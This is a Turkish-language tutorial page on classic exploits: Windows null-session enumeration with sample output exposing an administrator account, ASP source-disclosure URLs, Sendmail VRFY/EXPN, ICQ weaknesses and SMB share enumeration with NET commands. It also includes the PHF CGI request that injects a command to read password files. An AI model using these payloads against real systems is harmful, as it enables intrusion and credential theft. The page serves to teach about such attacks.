İçindekilerGirişİndex
YukarıİlkÖncekiSonrakiSon
Geriİleri
Yazdır

Exploitler

Exploit'ler Giriş

Exploitler genelde sistem tabanlı olarak çalışırlar yani Unix'e ait bir exploit Windows için çalışmaz. Bu güne kadar bulunan yaklaşık olarak 1000’in üzerinde exploit vardır.

Windows Null Session Exploit : Windows işletim sistemi, dışarıdaki kullanıcılara network üzerinde hiç bir hakka sahip olmadan session, user ve share information'ı verir. Kötü niyetli birisi bu exploiti kullanarak sistem hakkında çok kritik bilgiler sahibi olabilir.

Örnek :

Agis NT Peek utility V0.5 , (C) Copyright by Agis Corp 1998. All rights reserved. 

Connecting to : \\194.***.**.** 

connection established 

Processing.. 

\\194.***.***.***\NETLOGON                               (disk)  Logon server share 

\\194.***.***.***\i386                                        (disk)  

\\194.***.***.***\IE4.3000                                  (disk)  

Getting Session information .. 

 Server name : TiN User  name : (None) 

 Login Time  : 154461 secs (2574 mins)  IIdle Time   : 559 secs (9 mins) 

----------------------- 

 Server name : MiP  Usern  name : (None) 

 Login Time  : 573 secs (9 mins)  Idle Time   : 573 secs (9 mins) 

----------------------- 

[lord*****] 

 Password : ********** 

 Account : (lord*****) 

 Full name : (Lord zerg ******) 

 Comment : (Administration account) 

 User Comment : (Dark throne) 

 Password age : (0) hours 

 Privledge : Administrator 

 Home Dir : () 

 Script path : () 

 Spec Params : () 

 Workstations : () 

 Logon Hours : (1349551) 

 # of badpass : (0) 

 Logon count : (2896) 

 Logon Server : (\\*) 

 Country Code : (0) 

 Code Page : (0) 

 User ID : (500) 

 Group ID : (512) 

 Profile : () 

 Home drive : () 

 Password Exp : (0) 

 Auth Flags : 

-No auth flags 

 Flags :  
            - The logon script executed 
            - This account is normal 
            - password doesn't expire 
            - user can change password                                                   

PHF Exploit : Bu exploit oldukça eski olmasına rağmen halen karşılaşabilecek bir güvenlik açığıdır, PHF CGI yardımı ile sistemdeki dosyalara admin olarak erişilebilinir.

GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd 
http://www.phfcalistiranserver.com/cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd 

Yukarıdaki örnek Unix işletim sistemi ya da türevini kullanan bir makineden User bilgilerinin ve de şifrelerinin bulunduğu Password dosyasının görülmesini sağlar.

ASP Exploit : Active Server Page özelliği kullanan WebServer’larda URL' nin sonuna bir nokta(.) yada ::şDATA yazılarak ASP’nin içeriği (source code) görülebilir. Eğer ASP'nin içerisinde her hangi bir şifre varsa bu exploit çok tehlikeli olabilir.

http://www.aspkullananserver.com/default.asp.   
ya da 
http://www.aspkullananserver.com/default.asp::$DATA 

Sendmail Exploit : Eski Sendmail versiyonlarında birkaç basit hile ile sistemin şifrelerinin tutulduğu dosyayı çekmek mümkün olabilir. Ayrıca sistem kullanıcıları hakkında bilgi almak (EXPN) yada bir Username’in o Server’da olup olmadığını öğrenmek de mümkündür. (VRFY)

telnet mail.server.com:25 

ICQ Tabanlı Exploitler : Son derece zayıf bir mimariye sahip olan ICQ sistemi, kolayca taklit edilebilen, hatta gerçek spoofing bile yapılmasına gerek kalmayan bir sistemdir. ICQ kullanıcıları kolayca mesaj bombasına tutulabilir, passwordleri değiştirilebilir, onaya gerek kalmadan listeye alınabilir. IP'sini kullanıcı gösterme dese bile görülebilir yada ICQ chat yaparken mesaj taşması (flooding) yapılabilir.

Dosya ve yazıcı paylaşımı :

Windows 95 yada NT’de paylaşıma açılan disk ya da klasörlerin okuma-yazma izinlerine çok dikkat edilmelidir. Şifresiz (Şu birçok ISP’nin Inetpub Directory'sini tüm dünyaya yazma izni vererek paylaşıma açması gibi) ya da kolay tahmin edilebilecek (username ile aynı) bir şifre ile paylaşıma açılan disk yada klasörlerin her türlü saldırıya açık olması gibi durumlar istenmeyen durumlara yol açabilir.

Windows Start menüsünde Run seçeneği tıklatıldıktan sonra \\IP yazıp Enter tuşuna basılırsa, IP'si yazılan makinede paylaşıma açık olan yerler görülebilir. Windows’un içinde var olan NET komutunu kullanarak (NET VIEW \\IP) yine paylaşıma açık yerleri görebilir ve yine aynı komutla onlara bağlanılabilir.

(NET USE J: \\IP\paylaşımismi) Ayrıca linux yüklü bir makineden, smbclient programı ile aynı işlemleri yapılabilir.

Bu tip tehlikelerden korunmak için paylaşımlara sağlam bir şifre zorunludur. (anlamsız kelime+ rakamlar+hem büyük hem küçük harf kullanıması vs.)

Diğer Araçlar : Snork, cachecow, ADMmountd, mountd, faxsurvey, vintra,hotmail_exploit1-2, ioconfig lpd-rm, dilloncrond, nameserver_dead, lpd-mail, imapd4, binfo-udp, pinebug, mailxploit, newxterm, mailex, metainfo, xterm_exploit, dip3.3.7overflow-exploit, coke ve daha bir çok exploit bulunuyor.

İçindekilerGirişİndex
YukarıİlkÖncekiSonrakiSon
Geriİleri
Yazdır